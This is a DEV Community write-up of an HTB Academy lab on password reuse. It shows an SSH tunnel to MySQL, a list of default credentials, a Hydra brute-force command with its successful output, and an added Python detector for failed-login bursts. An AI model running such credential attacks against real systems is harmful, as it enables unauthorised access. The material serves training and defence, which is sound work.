DEV Community

maz4l

HTB Academy: Password Attacks Module – Password Reuse/Default Passwords


Challenge Overview:

The task is to find MySQL credentials using previously discovered user credentials. Below is the step-by-step approach I followed to solve this challenge.


Step 1: Establish an SSH Tunnel (Tab A)

Using SSH, I forwarded the MySQL port (3306) to my local machine:

ssh -L 4444:localhost:3306 sam@10.129.xx.xxx
  • Username: sam
  • Password: B@t********

Step 2: Download Default Credentials Cheat Sheet (Tab B)

I fetched a default credentials cheat sheet that includes common MySQL credentials:

wget https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv

Step 3: Filter for MySQL Credentials

Using grep, I extracted MySQL-specific credentials from the cheat sheet and saved them to a file for further testing:

cat DefaultCreds-Cheat-Sheet.csv 
grep -i 'mysql' DefaultCreds-Cheat-Sheet.csv > cred.list

I then manually edited the cred.list file to keep the most promising credentials:

admin@example.com:admin
root:<blank>
root:root
superdba:admin
scrutremote:admin

Step 4: Brute-Force Login Using Hydra

To automate the login attempts, I used hydra with the credentials file:

hydra -C cred.list mysql://localhost:4444

Success!

After a few attempts, Hydra successfully found valid MySQL credentials:

  • Login: superdba
  • Password: admin
[4444][mysql] host: localhost login: superdba password: admin
1 of 1 target successfully completed, 1 valid password found
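
From the defender's side, the attempts in Step 4 reach MySQL through the SSH tunnel from Step 1, so the server records them as coming from localhost rather than from a remote address. The following is an added example (not part of the original post) that flags several distinct accounts failing from one source within a short window; the log lines are constructed and assume failed logins are written to the MySQL error log as notes.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of MySQL error-log lines (not captured from a real host).
SAMPLE_LOG = """\
2024-05-01T10:15:02.101000Z 41 [Note] Access denied for user 'admin@example.com'@'localhost' (using password: YES)
2024-05-01T10:15:02.350000Z 42 [Note] Access denied for user 'root'@'localhost' (using password: YES)
2024-05-01T10:15:02.610000Z 43 [Note] Access denied for user 'root'@'localhost' (using password: YES)
2024-05-01T10:15:03.020000Z 45 [Note] Access denied for user 'scrutremote'@'localhost' (using password: YES)
2024-05-01T11:40:10.000000Z 77 [Note] Access denied for user 'report'@'10.0.0.7' (using password: YES)
"""

# The user part may itself contain '@', so match on the quotes, not on '@'.
DENIED = re.compile(
    r"^(?P<ts>\S+)Z .*Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def parse(log_text):
    """Yield (timestamp, user, source_host) for each failed-login line."""
    for line in log_text.splitlines():
        m = DENIED.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["user"], m["host"]

def find_bursts(log_text, window=timedelta(seconds=60), min_users=3):
    """Return {source_host: sorted accounts} where at least min_users distinct
    accounts failed within one window, i.e. a credential list being walked."""
    by_host = defaultdict(list)
    for ts, user, host in parse(log_text):
        by_host[host].append((ts, user))
    alerts = {}
    for host, events in by_host.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                alerts[host] = sorted(users)
                break
    return alerts

if __name__ == "__main__":
    for host, users in find_bursts(SAMPLE_LOG).items():
        print(f"ALERT source={host} accounts={users}")
```

A rule that only watches remote source addresses would miss this burst, which is why the check groups by whatever host MySQL logged, including localhost.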

Happy Hacking!
